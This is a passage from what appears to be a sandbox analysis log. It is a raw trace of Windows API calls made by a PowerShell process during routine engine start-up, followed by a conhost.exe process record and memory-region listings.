ulOptions=0x0, samDesired=0x20019, phkResult=0x1b81c1a8 | out: phkResult=0x1b81c1a8*=0x564) returned 0x0 [0269.915] RegQueryValueExW (in: hKey=0x564, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x1b81c1f8, lpData=0x0, lpcbData=0x1b81c1f0*=0x0 | out: lpType=0x1b81c1f8*=0x0, lpData=0x0, lpcbData=0x1b81c1f0*=0x0) returned 0x2 [0269.915] RegCloseKey (hKey=0x564) returned 0x0 [0269.915] CloseHandle (hObject=0x694) returned 1 [0270.657] CoCreateGuid (in: pguid=0x1b81c3b8 | out: pguid=0x1b81c3b8*(Data1=0x578f768, Data2=0xf80c, Data3=0x46f6, Data4=([0]=0xb2, [1]=0xb8, [2]=0x3d, [3]=0xc9, [4]=0x7c, [5]=0x38, [6]=0xc8, [7]=0x23))) returned 0x0 [0270.657] GetCurrentProcess () returned 0xffffffffffffffff [0270.657] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1b81c2d8 | out: TokenHandle=0x1b81c2d8*=0x694) returned 1 [0270.673] GetTokenInformation (in: TokenHandle=0x694, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1b81c378 | out: TokenInformation=0x0, ReturnLength=0x1b81c378) returned 0 [0270.673] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x1a666ee0 [0270.673] GetTokenInformation (in: TokenHandle=0x694, TokenInformationClass=0x8, TokenInformation=0x1a666ee0, TokenInformationLength=0x4, ReturnLength=0x1b81c378 | out: TokenInformation=0x1a666ee0, ReturnLength=0x1b81c378) returned 1 [0270.673] LocalFree (hMem=0x1a666ee0) returned 0x0 [0270.673] DuplicateTokenEx (in: hExistingToken=0x694, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x1b81c3d8 | out: phNewToken=0x1b81c3d8*=0x564) returned 1 [0270.674] CheckTokenMembership (in: TokenHandle=0x564, SidToCheck=0x24214b8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x1b81c3e0 | out: IsMember=0x1b81c3e0) returned 1 [0270.674] CloseHandle (hObject=0x564) returned 1 [0270.676] AmsiScanString () returned 0x80070015 [0270.701] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x1b81bab0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0270.701] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x1b81ba20, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0270.701] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81be60) returned 1 [0270.701] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x1b81bf40 | out: lpFileInformation=0x1b81bf40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298)) returned 1 [0270.702] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81be20) returned 1 [0270.702] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x1b81b9d0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0270.702] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x1b81b830, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0270.702] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x1b81b900, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0270.702] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81bd40) returned 1 [0270.702] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x1b81be20 | out: lpFileInformation=0x1b81be20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298)) returned 1 [0270.702] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81bd00) returned 1 [0270.702] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x1b81b7f0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0270.702] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81bcd0) returned 1 [0270.702] CreateFileW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x564 [0270.702] GetFileType (hFile=0x564) returned 0x1 [0270.702] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81bc40) returned 1 [0270.702] GetFileType (hFile=0x564) returned 0x1 [0270.702] WTGetSignatureInfo () returned 0x0 [0270.769] CertDuplicateCertificateContext (pCertContext=0x1aa06860) returned 0x1aa06860 [0270.769] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b81bd68 | out: phkResult=0x1b81bd68*=0x6ec) returned 0x0 [0270.769] RegQueryValueExW (in: hKey=0x6ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b81bdb8, lpData=0x0, lpcbData=0x1b81bdb0*=0x0 | out: lpType=0x1b81bdb8*=0x1, lpData=0x0, lpcbData=0x1b81bdb0*=0x56) returned 0x0 [0270.769] RegQueryValueExW (in: hKey=0x6ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b81bdb8, lpData=0x2446890, lpcbData=0x1b81bdb0*=0x56 | out: lpType=0x1b81bdb8*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1b81bdb0*=0x56) returned 0x0 [0270.769] RegCloseKey (hKey=0x6ec) returned 0x0 [0270.769] CoTaskMemAlloc (cb=0x10) returned 0x1a918780 [0270.769] CoTaskMemAlloc (cb=0x50) returned 0x1a9d4930 [0270.770] WinVerifyTrust () returned 0x0 [0270.770] CoTaskMemFree (pv=0x1a9d4930) [0270.770] CoTaskMemFree (pv=0x1a918780) [0270.770] CertFreeCertificateContext (pCertContext=0x1aa06860) returned 1 [0270.770] CloseHandle (hObject=0x564) returned 1 [0270.771] CoCreateGuid (in: pguid=0x1b81bd38 | out: pguid=0x1b81bd38*(Data1=0x4efbb57, Data2=0x25b4, Data3=0x4890, Data4=([0]=0xa2, [1]=0x5f, [2]=0x5d, [3]=0x35, [4]=0x67, [5]=0x93, [6]=0xba, [7]=0x72))) returned 0x0 [0271.120] CoCreateGuid (in: pguid=0x1b81bd38 | out: pguid=0x1b81bd38*(Data1=0x4fc1c5d2, Data2=0xd04a, Data3=0x4d21, Data4=([0]=0x8d, [1]=0xd5, [2]=0xf4, [3]=0xde, [4]=0xe, [5]=0x32, [6]=0x8c, [7]=0x25))) returned 0x0 [0271.120] CoCreateGuid (in: pguid=0x1b81bd38 | out: pguid=0x1b81bd38*(Data1=0x5ce76435, Data2=0xb62c, Data3=0x4286, Data4=([0]=0x9b, [1]=0xcf, [2]=0xa8, [3]=0xb0, [4]=0xd1, [5]=0xa5, [6]=0x1d, [7]=0xd0))) returned 0x0 [0271.365] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1a97a960 [0271.368] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1a97bc80 [0271.488] CoCreateGuid (in: pguid=0x1b81bd38 | out: pguid=0x1b81bd38*(Data1=0xdd934d4a, Data2=0x8849, Data3=0x4d83, Data4=([0]=0x84, [1]=0x4f, [2]=0x12, [3]=0x13, [4]=0x47, [5]=0x74, [6]=0x57, [7]=0xa4))) returned 0x0 [0271.966] CoCreateGuid (in: pguid=0x1b81bd38 | out: pguid=0x1b81bd38*(Data1=0x4fa8d731, Data2=0x7c1f, Data3=0x435d, Data4=([0]=0x89, [1]=0x87, [2]=0x67, [3]=0x7e, [4]=0x68, [5]=0x67, [6]=0x9e, [7]=0x2d))) returned 0x0 [0272.200] CoCreateGuid (in: pguid=0x1b81bd38 | out: pguid=0x1b81bd38*(Data1=0xdb2636d0, Data2=0x15ff, Data3=0x4bf3, Data4=([0]=0xb5, [1]=0x74, [2]=0xc1, [3]=0xf, [4]=0xc0, [5]=0x15, [6]=0xf6, [7]=0xc9))) returned 0x0 [0272.200] CoCreateGuid (in: pguid=0x1b81bd38 | out: pguid=0x1b81bd38*(Data1=0x111417dd, Data2=0x6bfb, Data3=0x4ea3, Data4=([0]=0x80, [1]=0x41, [2]=0x58, [3]=0xf6, [4]=0x1a, [5]=0xc5, [6]=0x75, [7]=0xef))) returned 0x0 [0272.200] CoCreateGuid (in: pguid=0x1b81bd38 | out: pguid=0x1b81bd38*(Data1=0x5b2fda35, Data2=0xbb, Data3=0x4272, Data4=([0]=0xa9, [1]=0x7d, [2]=0x11, [3]=0x41, [4]=0x7c, [5]=0xf2, [6]=0x72, [7]=0x3c))) returned 0x0 [0272.278] CoCreateGuid (in: pguid=0x1b81bd38 | out: pguid=0x1b81bd38*(Data1=0x9365d98d, Data2=0xf431, Data3=0x4595, Data4=([0]=0xa7, [1]=0x70, [2]=0x2a, [3]=0x41, [4]=0x8d, [5]=0x8c, [6]=0x74, [7]=0xa3))) returned 0x0 [0272.425] CoTaskMemAlloc (cb=0x20e) returned 0x1a9fab90 [0272.425] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1a9fab90, nSize=0x105 | out: lpBuffer="") returned 0x0 [0272.426] CoTaskMemFree (pv=0x1a9fab90) [0272.435] EtwEventActivityIdControl () returned 0x0 [0272.435] EtwEventActivityIdControl () returned 0x0 [0272.435] EtwEventActivityIdControl () returned 0x0 [0272.472] EtwEventActivityIdControl () returned 0x0 [0272.473] CoTaskMemAlloc (cb=0x20e) returned 0x1a9f7450 [0272.473] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1a9f7450, nSize=0x105 | out: lpBuffer="") returned 0x0 [0272.473] CoTaskMemFree (pv=0x1a9f7450) [0272.473] EtwEventActivityIdControl () returned 0x0 [0272.473] EtwEventActivityIdControl () returned 0x0 [0272.473] EtwEventActivityIdControl () returned 0x0 [0272.474] EtwEventActivityIdControl () returned 0x0 [0272.474] CoTaskMemAlloc (cb=0x20e) returned 0x1a9f8110 [0272.474] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1a9f8110, nSize=0x105 | out: lpBuffer="") returned 0x0 [0272.474] CoTaskMemFree (pv=0x1a9f8110) [0272.474] EtwEventActivityIdControl () returned 0x0 [0272.474] EtwEventActivityIdControl () returned 0x0 [0272.474] EtwEventActivityIdControl () returned 0x0 [0272.475] EtwEventActivityIdControl () returned 0x0 [0272.475] CoTaskMemAlloc (cb=0x20e) returned 0x1a9fe710 [0272.475] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1a9fe710, nSize=0x105 | out: lpBuffer="") returned 0x0 [0272.475] CoTaskMemFree (pv=0x1a9fe710) [0272.475] EtwEventActivityIdControl () returned 0x0 [0272.475] EtwEventActivityIdControl () returned 0x0 [0272.475] EtwEventActivityIdControl () returned 0x0 [0272.486] EtwEventActivityIdControl () returned 0x0 [0272.487] CoTaskMemAlloc (cb=0x20e) returned 0x1a9f8770 [0272.487] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1a9f8770, nSize=0x105 | out: lpBuffer="") returned 0x0 [0272.487] CoTaskMemFree (pv=0x1a9f8770) [0272.487] EtwEventActivityIdControl () returned 0x0 [0272.487] EtwEventActivityIdControl () returned 0x0 [0272.487] EtwEventActivityIdControl () returned 0x0 [0272.487] EtwEventActivityIdControl () returned 0x0 [0272.487] CoTaskMemAlloc (cb=0x20e) returned 0x1a9f7cd0 [0272.487] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1a9f7cd0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0272.487] CoTaskMemFree (pv=0x1a9f7cd0) [0272.487] EtwEventActivityIdControl () returned 0x0 [0272.487] EtwEventActivityIdControl () returned 0x0 [0272.487] EtwEventActivityIdControl () returned 0x0 [0272.488] EtwEventActivityIdControl () returned 0x0 [0272.610] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b81e0c8 | out: phkResult=0x1b81e0c8*=0x694) returned 0x0 [0272.610] RegQueryValueExW (in: hKey=0x694, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b81e118, lpData=0x0, lpcbData=0x1b81e110*=0x0 | out: lpType=0x1b81e118*=0x1, lpData=0x0, lpcbData=0x1b81e110*=0x56) returned 0x0 [0272.610] RegQueryValueExW (in: hKey=0x694, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b81e118, lpData=0x261e5c0, lpcbData=0x1b81e110*=0x56 | out: lpType=0x1b81e118*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1b81e110*=0x56) returned 0x0 [0272.611] RegCloseKey (hKey=0x694) returned 0x0 [0272.611] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b81e0c8 | out: phkResult=0x1b81e0c8*=0x694) returned 0x0 [0272.611] RegQueryValueExW (in: hKey=0x694, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b81e118, lpData=0x0, lpcbData=0x1b81e110*=0x0 | out: lpType=0x1b81e118*=0x1, lpData=0x0, lpcbData=0x1b81e110*=0x56) returned 0x0 [0272.611] RegQueryValueExW (in: hKey=0x694, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b81e118, lpData=0x261e968, lpcbData=0x1b81e110*=0x56 | out: lpType=0x1b81e118*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1b81e110*=0x56) returned 0x0 [0272.611] RegCloseKey (hKey=0x694) returned 0x0 [0272.611] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b81e0c8 | out: phkResult=0x1b81e0c8*=0x694) returned 0x0 [0272.611] RegQueryValueExW (in: hKey=0x694, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b81e118, lpData=0x0, lpcbData=0x1b81e110*=0x0 | out: lpType=0x1b81e118*=0x1, lpData=0x0, lpcbData=0x1b81e110*=0x56) returned 0x0 [0272.649] RegQueryValueExW (in: hKey=0x694, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b81e118, lpData=0x261ece8, lpcbData=0x1b81e110*=0x56 | out: lpType=0x1b81e118*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1b81e110*=0x56) returned 0x0 [0272.649] RegCloseKey (hKey=0x694) returned 0x0 [0272.649] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b81e0c8 | out: phkResult=0x1b81e0c8*=0x694) returned 0x0 [0272.649] RegQueryValueExW (in: hKey=0x694, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b81e118, lpData=0x0, lpcbData=0x1b81e110*=0x0 | out: lpType=0x1b81e118*=0x1, lpData=0x0, lpcbData=0x1b81e110*=0x56) returned 0x0 [0272.649] RegQueryValueExW (in: hKey=0x694, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b81e118, lpData=0x261f080, lpcbData=0x1b81e110*=0x56 | out: lpType=0x1b81e118*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1b81e110*=0x56) returned 0x0 [0272.649] RegCloseKey (hKey=0x694) returned 0x0 [0272.649] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b81e0c8 | out: phkResult=0x1b81e0c8*=0x694) returned 0x0 [0272.649] RegQueryValueExW (in: hKey=0x694, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b81e118, lpData=0x0, lpcbData=0x1b81e110*=0x0 | out: lpType=0x1b81e118*=0x1, lpData=0x0, lpcbData=0x1b81e110*=0x56) returned 0x0 [0272.650] RegQueryValueExW (in: hKey=0x694, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b81e118, lpData=0x261f428, lpcbData=0x1b81e110*=0x56 | out: lpType=0x1b81e118*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1b81e110*=0x56) returned 0x0 [0272.650] RegCloseKey (hKey=0x694) returned 0x0 [0272.650] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b81e0c8 | out: phkResult=0x1b81e0c8*=0x694) returned 0x0 [0272.650] RegQueryValueExW (in: hKey=0x694, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b81e118, lpData=0x0, lpcbData=0x1b81e110*=0x0 | out: lpType=0x1b81e118*=0x1, lpData=0x0, lpcbData=0x1b81e110*=0x56) returned 0x0 [0272.650] RegQueryValueExW (in: hKey=0x694, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b81e118, lpData=0x261f7d0, lpcbData=0x1b81e110*=0x56 | out: lpType=0x1b81e118*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1b81e110*=0x56) returned 0x0 [0272.650] RegCloseKey (hKey=0x694) returned 0x0 [0272.650] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b81e0c8 | out: phkResult=0x1b81e0c8*=0x694) returned 0x0 [0272.650] RegQueryValueExW (in: hKey=0x694, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b81e118, lpData=0x0, lpcbData=0x1b81e110*=0x0 | out: lpType=0x1b81e118*=0x1, lpData=0x0, lpcbData=0x1b81e110*=0x56) returned 0x0 [0272.650] RegQueryValueExW (in: hKey=0x694, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b81e118, lpData=0x261fb50, lpcbData=0x1b81e110*=0x56 | out: lpType=0x1b81e118*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1b81e110*=0x56) returned 0x0 [0272.650] RegCloseKey (hKey=0x694) returned 0x0 [0272.650] EtwEventActivityIdControl () returned 0x0 [0272.650] EtwEventActivityIdControl () returned 0x0 [0272.651] SetEvent (hEvent=0x6c0) returned 1 [0272.651] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1b81e4e0*=0x6c0, lpdwindex=0x1b81e2b4 | out: lpdwindex=0x1b81e2b4) returned 0x0 [0272.653] CoTaskMemAlloc (cb=0x20e) returned 0x1a9f7670 [0272.653] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1a9f7670, nSize=0x105 | out: lpBuffer="") returned 0x0 [0272.653] CoTaskMemFree (pv=0x1a9f7670) [0272.655] GetStdHandle (nStdHandle=0xfffffff4) returned 0x28 [0272.655] GetFileType (hFile=0x28) returned 0x2 [0272.656] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0x1b81e818 | out: lpConsoleScreenBufferInfo=0x1b81e818) returned 1 [0272.735] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0x1b81e818 | out: lpConsoleScreenBufferInfo=0x1b81e818) returned 1 [0272.881] EtwEventActivityIdControl () returned 0x0 [0272.881] EtwEventActivityIdControl () returned 0x0 [0272.881] EtwEventActivityIdControl () returned 0x0 [0273.010] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x694 [0273.011] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x1388, cHandles=0x1, pHandles=0x1b81e940*=0x694, lpdwindex=0x1b81e714 | out: lpdwindex=0x1b81e714) returned 0x80010115 [0278.029] EtwEventActivityIdControl () returned 0x0 [0278.046] CloseHandle (hObject=0x694) returned 1 [0278.047] EtwEventActivityIdControl () returned 0x0 [0278.047] EtwEventActivityIdControl () returned 0x0 [0278.047] EtwEventActivityIdControl () returned 0x0 [0278.047] EtwEventActivityIdControl () returned 0x0 [0278.049] SetEvent (hEvent=0x568) returned 1 [0278.049] SetEvent (hEvent=0x590) returned 1 [0278.049] SetEvent (hEvent=0x58c) returned 1 [0278.049] SetEvent (hEvent=0x570) returned 1 [0278.049] SetEvent (hEvent=0x598) returned 1 [0278.049] SetEvent (hEvent=0x594) returned 1 [0278.049] SetEvent (hEvent=0x57c) returned 1 [0278.049] SetEvent (hEvent=0x578) returned 1 [0278.050] SetEvent (hEvent=0x584) returned 1 [0278.054] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1b81f250*=0x574, lpdwindex=0x1b81f024 | out: lpdwindex=0x1b81f024) returned 0x0 [0278.055] SetThreadUILanguage (LangId=0x0) returned 0x409 [0278.103] CoCreateGuid (in: pguid=0x1b81f0f8 | out: pguid=0x1b81f0f8*(Data1=0x1b8b701c, Data2=0x77dc, Data3=0x4d20, Data4=([0]=0x9c, [1]=0x27, [2]=0x79, [3]=0x52, [4]=0x19, [5]=0x44, [6]=0x11, [7]=0x59))) returned 0x0 [0278.104] AmsiOpenSession () returned 0x0 [0278.104] AmsiScanString () returned 0x80070015 [0278.162] EtwEventActivityIdControl () returned 0x0 [0278.162] EtwEventActivityIdControl () returned 0x0 [0278.162] EtwEventActivityIdControl () returned 0x0 [0278.378] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x2, pHandles=0x1b81e8a0*=0x6ac, lpdwindex=0x1b81e694 | out: lpdwindex=0x1b81e694) returned 0x0 [0278.379] SetEvent (hEvent=0x6e0) returned 1 [0278.379] SetEvent (hEvent=0x6ac) returned 1 [0278.379] EtwEventActivityIdControl () returned 0x0 [0278.379] SetEvent (hEvent=0x6d8) returned 1 [0278.379] SetEvent (hEvent=0x6e0) returned 1 [0278.379] SetEvent (hEvent=0x6ac) returned 1 [0278.379] SetEvent (hEvent=0x69c) returned 1 [0278.379] SetEvent (hEvent=0x6f4) returned 1 [0278.379] SetEvent (hEvent=0x698) returned 1 [0278.380] SetEvent (hEvent=0x6f8) returned 1 [0278.380] SetEvent (hEvent=0x688) returned 1 [0278.384] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1b81f250*=0x574, lpdwindex=0x1b81f024 | out: lpdwindex=0x1b81f024) returned 0x0 [0278.471] CoGetContextToken (in: pToken=0x1b81fb00 | out: pToken=0x1b81fb00) returned 0x0 [0278.471] CoUninitialize () [0278.500] GenericStreamBase::Read () returned 0x0 [0278.500] GenericStreamBase::Read () returned 0x0 [0278.500] GenericStreamBase::Read () returned 0x0 Thread: id = 268 os_tid = 0xe78 Thread: id = 269 os_tid = 0x13b4 Thread: id = 270 os_tid = 0x1030 Thread: id = 271 os_tid = 0xeb0 [0263.818] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0263.819] CoGetContextToken (in: pToken=0x1bb2fac0 | out: pToken=0x1bb2fac0) returned 0x0 [0263.819] CObjectContext::QueryInterface () returned 0x0 [0263.819] CObjectContext::GetCurrentThreadType () returned 0x0 [0263.819] Release () returned 0x0 [0263.819] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0263.819] CoUninitialize () [0263.819] RoInitialize () returned 0x1 [0263.819] RoUninitialize () returned 0x0 Thread: id = 272 os_tid = 0xa5c Thread: id = 273 os_tid = 0x1200 Thread: id = 274 os_tid = 0x1204 [0269.435] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0269.436] CoGetContextToken (in: pToken=0x1bc2fa40 | out: pToken=0x1bc2fa40) returned 0x0 [0269.437] CObjectContext::QueryInterface () returned 0x0 [0269.437] CObjectContext::GetCurrentThreadType () returned 0x0 [0269.437] Release () returned 0x0 [0269.437] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0269.437] CoUninitialize () [0269.437] RoInitialize () returned 0x1 [0269.437] RoUninitialize () returned 0x0 Thread: id = 275 os_tid = 0x126c Process: id = "14" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x2debd000" os_pid = "0x10c4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "13" os_parent_pid = "0x10b0" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10265 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10266 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10267 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 10268 start_va = 0x200000 end_va = 0x3fffff 